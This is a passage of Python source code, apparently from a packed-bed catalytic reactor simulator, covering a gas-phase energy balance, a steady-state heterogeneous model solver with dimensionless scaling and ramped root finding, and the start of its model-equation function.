dxdtMat[indexT][r+1][z] = _const2[r]*dTsdti[r]
# updated temperature in the gas-solid interface
Ts_r_cat_gas = _Ts_r_Updated[-1]
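# NOTE
# solid-phase energy balance, treated analogously to the species balance:
# the interface node is closed with the film condition (the _alpha*_beta
# scaling of h/ks_eff), buildOrCoMatrix returns dTs*/dt at the collocation
# points, and the result is scaled by SoHeDiTe0/(rho_Cp_eff*Tf) through
# _const2 before being stored in the temperature layer of dxdt.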
# REVIEW
### gas phase ###
# check BC
if z == 0 and solverMeshSet is True:
# BC1
BC1_T_1 = PeNuHe0*dz
BC1_T_2 = 1/BC1_T_1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
# GaDe_DiLeVa, GaCpMeanMix_DiLeVa, v_z_DiLeVa = 1
# T*[0] = (T0 - Tf)/Tf
T_0 = 0
T_b = (T_0 + BC1_T_2*T_f)/(BC1_T_2 + 1)
T_bb = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_BC1)
elif z == 0 and solverMeshSet is False:
# BC1
BC1_T_1 = PeNuHe0*dzs[z]
BC1_T_2 = 1/BC1_T_1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
# GaDe_DiLeVa, GaCpMeanMix_DiLeVa, v_z_DiLeVa = 1
# T*[0] = (T0 - Tf)/Tf
T_0 = 0
T_b = (T_0 + BC1_T_2*T_f)/(BC1_T_2 + 1)
T_bb = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dzs[z], DIFF1_T_SET)
# d2Fdz2
# d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF_T_SET_BC1)
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = 0
_zR_c = dzs[z]/dzs[z-1]
# d2Fdz2
d2Tdz2 = FiDiNonUniformDerivative2(
d2Fdz2_T, dzs[z], DIFF2_T_SET_G, _zR_c)
elif (z > 0 and z < zNoNoDense) and solverMeshSet is False:
# NOTE
# dense section
# i=2,...,zNoNoDense-1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# function value
dFdz_T = [T_bb, T_b, T_c, T_f, T_ff]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = dzs[z-2]/dzs[z-1]
_zR_c = dzs[z]/dzs[z-1]
#
dTdz = FiDiNonUniformDerivative1(
dFdz_T, dzs[z], DIFF1_T_SET, _zR_b)
# d2Fdz2
d2Tdz2 = FiDiNonUniformDerivative2(
d2Fdz2_T, dzs[z], DIFF2_T_SET_G, _zR_c)
elif z == zNo - 1:
# BC2
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# forward
T_f = T_b
T_ff = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_BC2)
else:
# interior nodes
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2] if z < zNo-2 else 0
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_G)
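# NOTE
# same stencil selection as the species balance: a Danckwerts-type inlet
# closure with the inlet reference T*[0] = (T0 - Tf)/Tf taken as zero, a
# zero-gradient outlet, and uniform/non-uniform central differences for
# the interior and dense-mesh nodes.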
# REVIEW
# cal differentiate
# backward difference
# dTdz = (T_c - T_b)/(1*dz)
# convective term
_convectiveTerm = -1*v_z_DiLeVa*GaDe_DiLeVa*GaCpMeanMix_DiLeVa*dTdz
# central difference
# d2Tdz2 = (T_b - 2*T_c + T_f)/(dz**2)
# dispersion flux [kJ/m^3.s]
# _dispersionFluxT = (GaThCoEff*d2Tdz2)*1e-3
_dispersionFluxT = ((1/PeNuHe0)*GaThCoEff_DiLeVa*d2Tdz2)*1
# temperature in the catalyst surface [K]
# Ts_cat
# gas-solid interfacial heat flux [kJ/m^2.s]
_inwardFluxT = HeTrCo*SpSuAr*Tf*(Ts_r_cat_gas - T_c)*1e-3
# total heat transfer between gas and solid [kJ/m^3.s]
_heTrBeGaSoTerm = (1/GaHeCoTe0)*_inwardFluxT
# heat exchange term [kJ/m^3.s] -> [no unit]
_heatExchangeTerm = (1/GaHeCoTe0)*Qm
# convective flux, diffusive flux, enthalpy of reaction, cooling heat
# const
_const1 = GaDe_DiLeVa*GaCpMeanMix_DiLeVa*BeVoFr*(zf/vf)
_const2 = 1/_const1
#
dxdt_T = _const2*(_convectiveTerm + _dispersionFluxT +
_heTrBeGaSoTerm + _heatExchangeTerm)
dxdtMat[indexT][0][z] = dxdt_T
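# NOTE
# assembled dimensionless gas-phase energy balance (unit conversions omitted):
# rho*Cp*eps*(zf/vf)*dT*/dt = -v*rho*Cp*dT*/dz + (k_eff/Pe_h)*d2T*/dz2
#                             + (1/GaHeCoTe0)*[h*av*Tf*(Ts*_surf - T*) + Qm]
# mirroring the species balance, with conduction in place of dispersion.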
# NOTE
# flat
dxdt = dxdtMat.flatten().tolist()
# print
print(f"time: {t} seconds")
return dxdt
# NOTE
# static heterogeneous modeling
def runM9(self, initGuess=[]):
"""
modeling case (dimensionless)
steady-state heterogeneous model
unknowns: Ci, T (gas phase), Cci, Tc (solid phase, catalyst); P, v (static)
CT, GaDe = f(P, T, n)
numerical method: finite difference
args:
initGuess: initial guess dictionary (expects 'dataYs' from a previous solution)
"""
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverRootSet = solverConfig['root']
solverIVPSet = solverConfig['ivp']
solverMesh = solverConfig['mesh']
solverMeshSet = (solverMesh == "normal")
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# operation time [s]
opT = self.modelInput['operating-conditions']['period']
# process-type
processType = self.modelInput['operating-conditions']['process-type']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# number of reactions
reactionListNo = len(reactionList)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
# labelList = compList.copy()
# labelList.append("Temperature")
# labelList.append("Pressure")
labelList = pltc.makeLabels(
compList, ["Gas Temp"], compList, ["Solid Temp"])
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
indexVelocity = indexPressure + 1
# label id
labelIndex_ConcGasPhase = 0
labelIndex_TempGasPhase = compNo
labelIndex_ConcSolidPhase = labelIndex_TempGasPhase + 1
labelIndex_TempSolidPhase = labelIndex_ConcSolidPhase + compNo
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [kmol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [kmol/m^3]
SpCo0 = np.sum(SpCoi0)
# inlet superficial velocity [m/s]
SuGaVe0 = self.modelInput['feed']['superficial-velocity']
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# diffusivity coefficient - gas phase [m^2/s]
GaDii0 = self.modelInput['feed']['diffusivity']
# gas viscosity [Pa.s]
GaVii0 = self.modelInput['feed']['viscosity']
# gas mixture viscosity [Pa.s]
GaViMix0 = self.modelInput['feed']['mixture-viscosity']
# thermal conductivity - gas phase [J/s.m.K]
GaThCoi0 = self.modelInput['feed']['thermal-conductivity']
# mixture thermal conductivity - gas phase [J/s.m.K]
GaThCoMix0 = self.modelInput['feed']['mixture-thermal-conductivity']
# REVIEW
# domain length
DoLe = 1
# ramp list
rampList = solverSetting['M9']['rampList']
# orthogonal collocation points in the r direction
rNo = solverSetting['M9']['rNo']
# mesh setting
zMesh = solverSetting['T1']['zMesh']
# number of nodes
zNoNo = zMesh['zNoNo']
# domain length section
DoLeSe = zMesh['DoLeSe']
# mesh refinement degree
MeReDe = zMesh['MeReDe']
# mesh installment
if solverMeshSet is False:
zMeshRes = FiDiMeshGenerator(zNoNo, DoLe, DoLeSe, MeReDe)
# finite difference points
dataXs = zMeshRes['data1']
# dz lengths
dzs = zMeshRes['data2']
# finite difference point number
zNo = zMeshRes['data3']
# R ratio
zR = zMeshRes['data4']
# dz
dz = zMeshRes['data5']
else:
# finite difference points in the z direction
zNo = solverSetting['M9']['zNo']
# length list [reactor length]
dataXs = np.linspace(0, DoLe, zNo)
# element size - dz [m]
dz = DoLe/(zNo-1)
# reset
dzs = []
zR = []
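# NOTE
# with mesh refinement the element widths dzs[] are non-uniform (dense
# near the inlet section of the domain), so the stencils later switch to
# the non-uniform forms (FiDiNonUniformDerivative1/2) using the ratio
# R = dzs[z]/dzs[z-1]; with the normal mesh a single uniform dz is used.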
### calculation ###
# mole fraction in the gas phase
MoFri0 = np.array(rmtUtil.moleFractionFromConcentrationSpecies(SpCoi0))
# mixture molecular weight [kg/mol]
MiMoWe0 = rmtUtil.mixtureMolecularWeight(MoFri0, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe0 = calDensityIG(MiMoWe0, SpCo0*1000)
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList0 = calMeanHeatCapacityAtConstantPressure(compList, T)
# Cp mixture
GaCpMeanMix0 = calMixtureHeatCapacityAtConstantPressure(
MoFri0, GaCpMeanList0)
# thermal diffusivity in the gas phase [m^2/s]
GaThDi = calThermalDiffusivity(
GaThCoMix0, GaDe0, GaCpMeanMix0, MiMoWe0)
# var no (Ci,T)
varNo = compNo + 1
# concentration var no
varNoCon = compNo*zNo
# temperature var no
varNoTemp = 1*zNo
# concentration in solid phase
varNoConInSolidBlock = rNo*compNo
# total number
varNoConInSolid = varNoConInSolidBlock*zNo
# total var no along the reactor length (in gas phase)
varNoT = varNo*zNo
# number of layers
# concentration layer for each component C[m,j,i]
# m: layer, j: row (rNo), i: column (zNo)
# number of layers
noLayer = compNo+1
# var no in each layer
varNoLayer = zNo*(rNo+1)
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = noLayer*varNoLayer
# concentration var number
varNoCon = compNo*varNoLayer
# number of var rows [j]
varNoRows = rNo+1
# number of var columns [i]
varNoColumns = zNo
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# REVIEW
# solver setting
# orthogonal collocation method
OrCoClassSet = OrCoClass()
OrCoClassSetRes = OrCoClassSet.buildMatrix()
# NOTE
### dimensionless analysis ###
# concentration [kmol/m^3]
Cif = np.copy(SpCoi0)
# total concentration
Cf = SpCo0
# temperature [K]
Tf = T
# superficial velocity [m/s]
vf = SuGaVe0
# length [m]
zf = ReLe
# diffusivity [m^2/s]
Dif = np.copy(GaDii0)
# heat capacity at constant pressure [J/mol.K] | [kJ/kmol.K]
Cpif = np.copy(GaCpMeanList0)
# mixture heat capacity [J/mol.K] | [kJ/kmol.K]
Cpf = GaCpMeanMix0
# radius
rf = PaDi/2
# gas phase
# mass convective term - (list) [kmol/m^3.s]
_Cif = Cif if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.repeat(
np.max(Cif), compNo)
GaMaCoTe0 = (vf/zf)*_Cif
# mass diffusive term - (list) [kmol/m^3.s]
GaMaDiTe0 = (1/zf**2)*(_Cif*Dif)
# heat convective term [kJ/m^3.s]
GaHeCoTe0 = (GaDe0*vf*Tf*(Cpf/MiMoWe0)/zf)*1e-3
# heat diffusive term [kJ/m^3.s]
GaHeDiTe0 = (Tf*GaThCoMix0/zf**2)*1e-3
# solid phase
# mass diffusive term - (list) [kmol/m^3.s]
SoMaDiTe0 = (Dif*_Cif)/rf**2
# heat diffusive term [kJ/m^3.s]
SoHeDiTe0 = (GaThCoMix0*Tf/rf**2)*1e-3
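# NOTE
# these characteristic terms scale each balance to order one: e.g.
# GaMaCoTe0 = (vf/zf)*Cif is the feed convective mass flux per unit bed
# volume and SoHeDiTe0 = k0*Tf/rf^2 scales conduction inside the particle;
# dividing the dimensional source terms by them yields the dimensionless
# equations assembled in modelEquationM9.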
### dimensionless numbers ###
# Re Number
ReNu0 = calReNoEq1(GaDe0, SuGaVe0, PaDi, GaViMix0)
# Sc Number
ScNu0 = calScNoEq1(GaDe0, GaViMix0, GaDii0)
# Sh Number (choose method)
ShNu0 = calShNoEq1(ScNu0, ReNu0, CONST_EQ_Sh['Frossling'])
# Prandtl Number
PrNu0 = calPrNoEq1(GaCpMeanMix0, GaViMix0, GaThCoMix0, MiMoWe0)
# Nu number
NuNu0 = calNuNoEq1(PrNu0, ReNu0)
# Strouhal number
StNu = 1
# Peclet number - mass transfer
PeNuMa0 = (vf*zf)/Dif
# Peclet number - heat transfer
PeNuHe0 = (zf*GaDe0*(Cpf/MiMoWe0)*vf)/GaThCoMix0
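# NOTE
# PeNuMa0 = vf*zf/Dif and PeNuHe0 = zf*rho0*cp0*vf/k0 compare axial
# convection with dispersion/conduction; they appear as 1/Pe prefactors
# on the second-derivative terms in the dimensionless balances.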
### transfer coefficient ###
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu0, GaDii0, PaDi)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu0, GaThCoMix0, PaDi)
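# NOTE
# the film coefficients are estimated from a Frossling-type Sherwood
# correlation and the analogous Nusselt correlation; presumably the
# helper functions apply the standard definitions MaTrCo = Sh*D/dp and
# HeTrCo = Nu*k/dp for a particle of diameter dp.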
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaViMix0,
"varNo": varNo,
"varNoT": varNoT,
"reactionListNo": reactionListNo,
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T,
"SuGaVe0": SuGaVe0,
"GaDii0": GaDii0,
"GaThCoi0": GaThCoi0,
"GaVii0": GaVii0,
"GaDe0": GaDe0,
"GaCpMeanMix0": GaCpMeanMix0,
"GaThCoMix0": GaThCoMix0
},
"meshSetting": {
"solverMesh": solverMesh,
"solverMeshSet": solverMeshSet,
"noLayer": noLayer,
"varNoLayer": varNoLayer,
"varNoLayerT": varNoLayerT,
"varNoRows": varNoRows,
"varNoColumns": varNoColumns,
"rNo": rNo,
"zNo": zNo,
"dz": dz,
"dzs": dzs,
"zR": zR,
"zNoNo": zNoNo
},
"solverSetting": {
"dFdz": solverSetting['T1']['dFdz'],
"d2Fdz2": solverSetting['T1']['d2Fdz2'],
"dTdz": solverSetting['T1']['dTdz'],
"d2Tdz2": solverSetting['T1']['d2Tdz2'],
"OrCoClassSetRes": OrCoClassSetRes,
},
"reactionRateExpr": reactionRateExpr
}
# dimensionless analysis parameters
DimensionlessAnalysisParams = {
"Cif": Cif,
"Tf": Tf,
"vf": vf,
"zf": zf,
"Dif": Dif,
"Cpif": Cpif,
"Cpf": Cpf,
"rf": rf,
"GaMaCoTe0": GaMaCoTe0,
"GaMaDiTe0": GaMaDiTe0,
"GaHeCoTe0": GaHeCoTe0,
"GaHeDiTe0": GaHeDiTe0,
"ReNu0": ReNu0,
"ScNu0": ScNu0,
"ShNu0": ShNu0,
"PrNu0": PrNu0,
"PeNuMa0": PeNuMa0,
"PeNuHe0": PeNuHe0,
"MaTrCo": MaTrCo,
"HeTrCo": HeTrCo,
"SoMaDiTe0": SoMaDiTe0,
"SoHeDiTe0": SoHeDiTe0
}
# NOTE
# initial guess set
_initGuessVal = initGuess['dataYs']
_initGuessVal_Concentration = _initGuessVal[:-1]
_initGuessVal_Temperature = _initGuessVal[-1]
initGuessConc_DiLeVa = rmtUtil.calDiLessValue(
_initGuessVal[:-1], np.max(_Cif))
initGuessTemp_DiLeVa = rmtUtil.calDiLessValue(
_initGuessVal[-1], Tf, "TEMP")
# initial guess at t>0 and z>>0
IVMatrixShape = (noLayer, varNoRows, varNoColumns)
IV2D = np.zeros(IVMatrixShape)
# bounds
BMatrixShape = (noLayer, varNoRows, varNoColumns)
BUp2D = np.zeros(BMatrixShape)
BLower2D = np.zeros(BMatrixShape)
# initialize IV2D
# -> concentration [kmol/m^3]
for m in range(noLayer - 1):
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
# 0.5 # SpCoi0[m]/np.max(SpCoi0)
IV2D[m][j][i] = initGuessConc_DiLeVa[m, i]
# set bounds
BUp2D[m][j][i] = 1
BLower2D[m][j][i] = 0
else:
# solid phase
# 0.5 # SpCoi0[m]/np.max(SpCoi0)
IV2D[m][j][i] = initGuessConc_DiLeVa[m, i]
# set bounds
BUp2D[m][j][i] = 1
BLower2D[m][j][i] = 0
# temperature
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
# 0 + 1e-2*varNoColumns # T
IV2D[noLayer - 1][j][i] = initGuessTemp_DiLeVa[i]
# set bounds
BUp2D[noLayer - 1][j][i] = 1
BLower2D[noLayer - 1][j][i] = -1
else:
# solid phase
# 0 + 0.99e-2*varNoColumns # T
IV2D[noLayer - 1][j][i] = initGuessTemp_DiLeVa[i]
# set bounds
BUp2D[noLayer - 1][j][i] = 1
BLower2D[noLayer - 1][j][i] = -1
# flatten IV
IV = IV2D.flatten()
BUp = BUp2D.flatten()
BLower = BLower2D.flatten()
# set bound
setBounds = (BLower, BUp)
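# NOTE
# layout of the unknown vector: a (noLayer, varNoRows, varNoColumns)
# block where layer m < compNo holds species m, row 0 is the gas phase,
# rows 1..rNo are the particle collocation points, and the last layer
# holds the gas/solid temperatures; bounds of [0, 1] (concentrations) and
# [-1, 1] (dimensionless temperatures) are only enforced by least_squares.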
# result
dataPack = []
# solver setting
funSet = PackedBedReactorClass.modelEquationM9
paramsSet = (reactionListSorted, reactionStochCoeff,
FunParam, DimensionlessAnalysisParams, processType)
# NOTE
rampListLen = len(rampList)
# ramp nonlinear term
for k in range(rampListLen):
rampSet = rampList[k]
print("rampSet: ", rampSet)
### solve a system of nonlinear algebraic equation ###
if solverRootSet == "fsolve":
sol = optimize.fsolve(funSet, IV, args=(paramsSet, rampSet))
# result
successStatus = len(sol) > 0
# all results
# components, temperature layers
dataYs = sol
elif solverRootSet == "root":
# root
# lm, krylov, anderson, hybr, broyden1, linearmixing, diagbroyden, excitingmixing
sol = optimize.root(funSet, IV, args=(
paramsSet, rampSet), method='lm')
# result
successStatus = sol.success
# all results
# components, temperature layers
dataYs = sol.x
elif solverRootSet == "least_squares":
sol = optimize.least_squares(
funSet, IV, bounds=setBounds, args=(paramsSet, rampSet))
# result
successStatus = sol.success
# all results
# components, temperature layers
dataYs = sol.x
# NOTE
# update initial guess
IV = dataYs
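# NOTE
# simple continuation strategy: the algebraic system is solved once per
# rampSet value (the reaction term is scaled by rampSet inside
# modelEquationM9), and each converged solution seeds the next solve
# through IV = dataYs, which helps the root finder reach the fully
# reactive steady state.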
# check
if successStatus is False:
raise RuntimeError("nonlinear solver failed to converge")
else:
# std format
dataYs_Reshaped = np.reshape(
dataYs, (noLayer, varNoRows, varNoColumns))
# -> concentration
dataYs_Concentration_DiLeVa = dataYs_Reshaped[:-1]
# gas phase
_ConcGasPhase_DiLeVa = dataYs_Concentration_DiLeVa[:, 0, :]
# solid phase
_ConcSolidPhase_DiLeVa = dataYs_Concentration_DiLeVa[:, 1:, :]
# -> temperature
dataYs_Temperature_DiLeVa = dataYs_Reshaped[-1] if processType != PROCESS_SETTING['ISO-THER'] else np.repeat(
[[0], [0]], zNo).reshape((varNoRows, varNoColumns))
# gas phase
_TempGasPhase_DiLeVa = dataYs_Temperature_DiLeVa[0, :].reshape(
(1, zNo))
# solid phase
_TempSolidPhase_DiLeVa = dataYs_Temperature_DiLeVa[1:, :]
# sort out
params1 = (compNo, noLayer, varNoRows, varNoColumns, rNo, zNo)
params2 = (Cif, Tf, processType)
dataYs_Sorted = sortedResult3(
_ConcGasPhase_DiLeVa, _TempGasPhase_DiLeVa, _ConcSolidPhase_DiLeVa, _TempSolidPhase_DiLeVa, params1, params2)
# gas phase
# component concentration [kmol/m^3]
_ConcGasPhase_ReVa = dataYs_Sorted['data1']
# temperature [K]
_TempGasPhase_ReVa = dataYs_Sorted['data2']
# solid phase
# component concentration [kmol/m^3]
_ConcSolidPhase_ReVa = dataYs_Sorted['data3']
# temperature [K]
_TempSolidPhase_ReVa = dataYs_Sorted['data4']
# REVIEW
# convert concentration to mole fraction
_ConcGasPhaseTot = np.sum(_ConcGasPhase_ReVa, axis=0)
_MoFriGasPhase = _ConcGasPhase_ReVa/_ConcGasPhaseTot
# convert concentration to mole fraction
_ConcSolidPhaseTot = np.sum(_ConcSolidPhase_ReVa, axis=0)
_MoFriSolidPhase = _ConcSolidPhase_ReVa/_ConcSolidPhaseTot
# combine
# gas phase
_dataYs_GasPhase = np.concatenate(
(_MoFriGasPhase, _TempGasPhase_ReVa), axis=0)
# solid phase
_MoFriSolidPhase_Reshaped = np.zeros((compNo, varNoColumns))
for j in range(compNo):
_MoFriSolidPhase_Reshaped[j, :] = _MoFriSolidPhase[j]
# set
_dataYs_SolidPhase = np.concatenate(
(_MoFriSolidPhase_Reshaped, _TempSolidPhase_ReVa), axis=0)
#
_dataYs = np.concatenate(
(_dataYs_GasPhase, _dataYs_SolidPhase), axis=0)
# save data
# dataPack.append({
# "successStatus": successStatus,
# "dataYCon": dataYs1GasPhase,
# "dataYTemp": dataYs2GasPhase,
# "dataYs": _dataYs,
# "dataYCons": dataYs1SolidPhase,
# "dataYTemps": dataYs2SolidPhase,
# })
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# plot info
plotTitle = f"Steady-State {processType} Modeling [M14] finished in {elapsed} seconds"
xLabelSet = "Dimensionless Particle Radius"
yLabelSet = "Dimensionless Concentration"
# REVIEW
# *** post-processing results ***
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo], dataList[indexTemp],
dataList[labelIndex_ConcSolidPhase:labelIndex_ConcSolidPhase+compNo], dataList[labelIndex_TempSolidPhase]]
# subplot result
pltc.plots2DSub(dataLists, xLabelSet, yLabelSet, plotTitle)
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM9(y, paramsSet, rampSet=1):
"""
model [static modeling]
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
varNo: number of variables (Ci, CT, T)
varNoT: number of variables in the domain (zNo*varNoT)
reactionListNo: reaction list number
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
constBC1:
VoFlRa0: inlet volumetric flowrate [m^3/s],
SpCoi0: species concentration [kmol/m^3],
SpCo0: total concentration [kmol/m^3]
P0: inlet pressure [Pa]
T0: inlet temperature [K]
meshSetting:
solverMesh: mesh installment
solverMeshSet:
true: normal
false: mesh refinement
noLayer: number of layers
varNoLayer: var no in each layer
varNoLayerT: total number of vars (Ci,T,Cci,Tci)
varNoRows: number of var rows [j]
varNoColumns: number of var columns [i]
zNo: number of finite difference in z direction
rNo: number of orthogonal collocation points in r direction
dz: differential length [m]
dzs: differential length list [-]
zR: z ratio
zNoNo: number of nodes in the dense and normal sections
solverSetting:
OrCoClassSetRes: constants of OC methods
reactionRateExpr: reaction rate expressions []
DimensionlessAnalysisParams:
Cif: feed concentration [kmol/m^3]
Tf: feed temperature
vf: feed superficial velocity [m/s]
zf: domain length [m]
Dif: diffusivity coefficient of component [m^2/s]
Cpif: feed heat capacity at constant pressure [kJ/kmol.K] | [J/mol.K]
rf: particle radius [m]
GaMaCoTe0: feed mass convective term of gas phase [kmol/m^3.s]
GaMaDiTe0: feed mass diffusive term of gas phase [kmol/m^3.s]
GaHeCoTe0: feed heat convective term of gas phase [kJ/m^3.s]
GaHeDiTe0: feed heat diffusive term of gas phase [kJ/m^3.s]
SoMaDiTe0: feed mass diffusive term of solid phase [kmol/m^3.s]
SoHeDiTe0: feed heat diffusive term of solid phase [kJ/m^3.s]
ReNu0: Reynolds number
ScNu0: Schmidt number
ShNu0: Sherwood number
PrNu0: Prandtl number
PeNuMa0: mass Peclet number
PeNuHe0: heat Peclet number
MaTrCo: mass transfer coefficient - gas/solid [m/s]
HeTrCo: heat transfer coefficient - gas/solid [J/m^2.s.K]
processType
"""
# parameters
reactionListSorted, reactionStochCoeff, FunParam, DimensionlessAnalysisParams, processType = paramsSet
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reaction no
reactionListNo = const['reactionListNo']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# catalyst density [kgcat/m^3 of particle]
CaDe = ReSpec['CaDe']
# catalyst heat capacity at constant pressure [kJ/kg.K]
CaSpHeCa = ReSpec['CaSpHeCa']
# catalyst porosity
CaPo = ReSpec['CaPo']
# catalyst tortuosity
CaTo = ReSpec['CaTo']
# catalyst thermal conductivity [J/K.m.s]
CaThCo = ReSpec['CaThCo']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# var no. (concentration, temperature)
varNo = const['varNo']
# var no. in the domain
varNoT = const['varNoT']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# inlet superficial velocity [m/s]
# SuGaVe0 = constBC1['SuGaVe0']
# inlet diffusivity coefficient [m^2/s]
GaDii0 = constBC1['GaDii0']
# inlet gas thermal conductivity [J/s.m.K]
GaThCoi0 = constBC1['GaThCoi0']
# gas viscosity
GaVii0 = constBC1['GaVii0']
# gas density [kg/m^3]
GaDe0 = constBC1['GaDe0']
# heat capacity at constant pressure [kJ/kmol.K] | [J/mol.K]
GaCpMeanMix0 = constBC1['GaCpMeanMix0']
# gas thermal conductivity [J/s.m.K]
GaThCoMix0 = constBC1['GaThCoMix0']
# mesh setting
meshSetting = FunParam['meshSetting']
# mesh installment
solverMesh = meshSetting['solverMesh']
# mesh refinement
solverMeshSet = meshSetting['solverMeshSet']
# number of layers
noLayer = meshSetting['noLayer']
# var no in each layer
varNoLayer = meshSetting['varNoLayer']
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = meshSetting['varNoLayerT']
# number of var rows [j]
varNoRows = meshSetting['varNoRows']
# number of var columns [i]
varNoColumns = meshSetting['varNoColumns']
# rNo
rNo = meshSetting['rNo']
# zNo
zNo = meshSetting['zNo']
# dz [m]
dz = meshSetting['dz']
# dzs [m]/[-]
dzs = meshSetting['dzs']
# R ratio
zR = meshSetting['zR']
# number of nodes in the dense and normal sections
zNoNo = meshSetting['zNoNo']
# dense
zNoNoDense = zNoNo[0]
# normal
zNoNoNormal = zNoNo[1]
# solver setting
solverSetting = FunParam['solverSetting']
# mass balance equation
DIFF1_C_SET = solverSetting['dFdz']
DIFF2_C_SET_BC1 = solverSetting['d2Fdz2']['BC1']
DIFF2_C_SET_BC2 = solverSetting['d2Fdz2']['BC2']
DIFF2_C_SET_G = solverSetting['d2Fdz2']['G']
# energy balance equation
DIFF1_T_SET = solverSetting['dTdz']
